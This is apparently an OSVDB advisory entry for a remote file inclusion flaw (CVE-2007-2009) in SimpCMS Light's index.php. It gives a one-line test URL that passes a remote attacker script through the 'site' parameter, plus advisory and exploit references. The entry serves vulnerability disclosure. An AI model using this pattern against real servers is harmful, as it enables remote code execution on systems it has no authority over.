SimpCMS Light index.php site Variable Remote File Inclusion

2007-04-10T06:34:03
ID OSVDB:34775
Type osvdb
Reporter OSVDB
Modified 2007-04-10T06:34:03

Description

Manual Testing Notes

http://[target]/[path]/index.php?site=[EvilScript]

References:

Secunia Advisory ID: 24851
Other Advisory URL: http://milw0rm.com/exploits/3705
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0168.html
Mail List Post: http://attrition.org/pipermail/vim/2007-April/001515.html
Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001513.html
ISS X-Force ID: 33572
FrSIRT Advisory: ADV-2007-1348
CVE-2007-2009
Bugtraq ID: 23439